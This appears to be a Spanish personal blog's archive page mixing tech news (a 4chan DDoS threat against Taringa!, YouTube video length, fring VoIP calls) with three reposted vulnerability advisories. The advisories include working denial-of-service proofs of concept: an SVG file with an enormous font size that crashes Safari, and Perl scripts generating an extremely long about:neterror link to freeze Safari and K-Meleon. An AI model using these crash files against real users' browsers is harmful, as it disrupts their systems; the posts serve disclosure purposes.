Archive for the 'Web 2.0' Category

No os preocupéis, sigo vivo !

Comentaros que aunque no me veáis escribir mucho por aquí ello tiene un signifcado; me estoy centrando más en un blog que comencé hace unos años en forma de proyecto y estoy dejando un poco de lado este, puesto que este es más de carácter personal y aquel más de carácter general por ello publico todo lo relacionado con la informática y algún que otro tema offtopic.

Click sobre la imágen para acceder 🙂

4chan amenaza a Taringa! con ataques DDoS

Parece que el mundo “underground” de la red andan revueltos y dos de los portales más conocidos y más activos de la red no se caen demasiado en gracia. En una especie de comunicado, la red 4chan, anuncia un ataque DDoS (Denegación de Servicio Distribuída) contra la comunidad Taringa! el día 07/05/2011 al que han denominado “Operation Barbarossa”.

Las medidas tomadas por los usuarios de 4chan atienden, según sus declaraciones, a que Taringa! hace uso de sus memes como si fuesen originales y de su creación. Ésta práctica ha encolerizado a los millones de usuarios que usan a diario el portal y se han plantado para que ésta mala costumbre no se siga repitiendo.

Para realizar el ataque dan todo tipo de información a sus usuarios e incluso les recomiendan el software a utilizar (LOIC). Los ataques de DDoS, por explicarlo de manera muy sencilla, provocan que el servidor se colapse ante el masivo aumento de peticiones y deje de funcionar correctamente. Ya se han tomado acciones similares por otros grupos anónimos de usuarios (Como los realizados por Anonymous contra Irán o Sony).

Seguir leyendo ‘4chan amenaza a Taringa! con ataques DDoS’

YouTube sin límites de tiempo

Buenas noticias para todos los usuarios con cuenta en YouTube. El portal prepara la llegada de vídeos sin límites de tiempo. Tras la llegada en septiembre de la ampliación a 15 minutos como máximo, Google ha dado permiso a algunos usuarios para alojar vídeos sin límite, un acción claramente destinada a implantarla poco poco y de manera escalonada para todos.

Las primeras admisiones son cuentas estables que desde YouTube explican como “usuarios con trayectoria de cumplir con las reglas de Comunidad del portal”, vamos, que han seleccionado cuidadosamente para que no se les cuele algún “insensato”. También nos podemos imaginar que habrá una pequeña censura a todos aquellos usuarios que algún momento hayan violado los términos de copyright de la web.

Este paso, grande para todos nosotros, también puede ocasionarles más de un problema al portal, ya que habría posibilidad de subidas de vídeos completos, ya sean películas o series, aunque desde Google afirman que este momento es muy propicio, principalmente por los avances en la identificación de contenidos:

Más de 1000 socios a nivel mundial utilizan el Content ID para administrar su contenido en YouTube, incluyendo los principales estudios de cine de Estados Unidos y sellos discográficos. Seguimos tan involucrados como siempre en la construcción y mejora de la tecnología más sofisticada para ayudar a los propietarios de derechos de autor a proteger sus derechos

En cualquier caso y hasta que comiencen a ofrecer a toda la comunidad la posibilidad de vídeos sin límites, iremos recibiendo noticias de aquellos usuarios que ya disfrutan de él.

Seguir leyendo ‘YouTube sin límites de tiempo’

Fring ofrece su propio servicio de llamadas a móviles y fijos “desde” 1 céntimo el minuto

fring anunció ayer la posibilidad de hacer llamadas a teléfonos fijos y móviles desde 1 céntimo de euro el minuto. El servicio, que se llama fringOUT está desde ya disponible para móviles Nokia (familia S60) y en las próximas semanas para Android e iOS.

El mercado de las llamadas VOiP sigue estando prácticamente controlado por Skype en estos momentos, con picos diarios de llamadas que alcanzan los 23 millones de usuarios simultáneos y una expansión muy fuerte en los últimos años.

Pero poco a poco más y más competidores se están acercando a esta oportunidad de negocio, lo que podría provocar una tendencia a la baja de las tarifas que hasta ahora se habían mantenido muy estables por la falta de competencia.

Google hizo su introducción hace unas pocas semanas con el lanzamiento de las llamadas a través de GMail y ahora es fring el último en sumarse a la carga, ofreciendo su propio servicio. Hasta hace muy poco se podían realizar llamadas VOiP desde fring a través de la red de Skype, pero tras el lanzamiento de fring para el iPhone 4 dicho acceso quedó bloqueado.

Aunque el precio de las llamadas no es el mismo para todos los países puesto que es “desde” 1 céntimo el minuto, en la propia web de fring podréis encontrar una calculadora de las diferentes tarifas según el país de destino. En concreto, llamar a un móvil en España costará entre 0.11 y 0.14 céntimos el minuto.

Seguro que en el momento en el que lancen las versiones para Android e iOS podremos hacer un mejor análisis de cómo funciona fringOUT. Mientras tanto, si alguno de vosotros tiene un Nokia (series S60) agradeceríamos vuestros comentarios sobre este nuevo servicio, que viene a aportar mayor competencia a un sector que puede resultar estratégico en los próximos años.

Seguir leyendo ‘Fring ofrece su propio servicio de llamadas a móviles y fijos “desde” 1 céntimo el minuto’

Safari for windows Invalid SGV text style Webkit.dll DoS

###################################################
Safari for windows Invalid SGV text style  Webkit.dll DoS
Afectado: http://www.apple.com
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html
Notificación al afectado: Sí Exploit disponible: Sí
###################################################

Safari Browser (en windows) es vulnerable siendo propenso a Denegaciones de Servicio, este problema afecta a webkit.dll y se bloquea al tratar de hacer que Safari abra una imagen SGV con un tamaño grande de fuente.

############
versiones
############

Safari para windows 5.0.1 (7533.17.8)
en windows 7 ultimate completamente parcheado.

Safari para windows windows 5.0.1 (7533.17.8)
en windows xp home sp3 completamente parcheado.

############
Línea de tiempo
############

Descubierto:19-08-2010
Notificado al vendedor:25-08-2010
Respuesta del vendedor:26-08-2010
Publicado: 30-09-2010

####################
PoC
####################

Guarda el código como “image.svg” y ábrelo con Safari, mirad como se añaden algunos píxeles “extra” en estilo de la fuente en el tamaño del texto.

################ BOF image.svg ######################

<?xml version=”1.0″?>
<svg xmlns=”http://www.w3.org/2000/svg&#8221; width=”200″ height=”200″ version=”1.1″>
<defs>
<mask id=”crash”>
<polygon points=”155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935″
transform=”matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)”
style=”fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1″ />
</mask>
</defs>

<g mask=”url(#crash)” style=”font-family:Verdana; font-size: 10pt; fill:red;”>
<text x=”80″ y=”80″ style=”font-size:111000000pt; fill:pink;”>Safari</text>
<text x=”0″ y=”130″ style=”font-size: 60pt; fill:pink;”>Now</text>
<text x=”20″ y=”190″ style=”font-size: 60pt; fill:pink;”>Crash</text>
</g>

</svg>

###############EOF####################

################# €nd ###############

Thnx To cLimbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)

thz Lost 😉

Safari for windows Long link DoS

############################################
Safari for windows Long link DoS
URL del creador: http://www.apple.com/safari/
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Creador notificado: SÍ exploit disponible: SÍ
############################################

Safari es vulnerable a tareas con un enlace muy largo. Este problema es explotable por medio de enlaces web, como <a href=”very long URL”>click here</a> o vectores similares. Safari no ejecuta el enlace y congelada a su vez el navegador, acabando en una condición de denegación de servicio (DoS).

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

windows 7 Ultimate:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

####################
PoC
####################

#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long “a href” Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print “Usage: $0 <archivo.html>\n”;

}

$cabecera = “<html>” . “\n”;
$payload = “<a href=\”about:neterror?e=connectionFailure&c=” . “/” x 1028135 . “\”>click here if you can :)</a>” . “\n”;
$fin = “</html>”;

$datos = $cabecera . $payload . $fin;

open(FILE, ‘<‘ . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Links Relacionados
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Caso de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
——————
thz Lost 😉

K-Meleon for windows about:neterror Stack Overflow DoS

############################################
K-Meleon for windows about:neterror Stack Overflow DoS
URL creador: http://kmeleon.sourceforge.net/
Reportado por: http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Notificación al creador: SÍ Exploit disponible: SÍ
############################################

K-Meleon es un navegador web muy rápido, personalizable y ligero, basado en el motor de renderizado Gecko desarrollado por Mozilla, que es también usado por Firefox. K-Meleon es libre, es software de código abierto distribuido bajo la GNU General Public License y está diseñado específicamente para el OS Microsoft Windows (Win32).

K-Meleon es propenso a algunas vulnerabilidades, entre ellas: a colgarse con una URL muy larga, como about:neterror no limita la cantidad de caracteres que el usuario ponga en los parámetros ‘c’ ‘d’ si creamos una url malformada del navegador puede explotarse muy fácil. Esto es explotable a través de enlaces web, como por ejemplo; “haz clic aquí” o mediante window.location.replace url (‘muy largo’) o vectores similares.

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)

windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)

############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

########################
ASM code stack overflow
########################

################
# PoC
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long “a href” Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print “Usage: $0 <archivo.html>\n”;

}

$cabecera = “<html>” . “\n”;
$payload = “<a href=\”about:neterror?e=connectionFailure&c=” . “/” x 1028135 . “\”>click here if you can :)</a>” . “\n”;
$fin = “</html>”;

$datos = $cabecera . $payload . $fin;

open(FILE, ‘<‘ . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Casos de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
————-
thz Lost 😉


Blog Stats

  • 612,371 visitas

RSS

Feed
julio 2017
L M X J V S D
« Sep    
 12
3456789
10111213141516
17181920212223
24252627282930
31  

Usuarios online:

counter

Otras URL’s

TiraEcol

Tira Ecol
BlogESfera Directorio de Blogs Hispanos - Agrega tu Blog
Google PageRank 
		Checker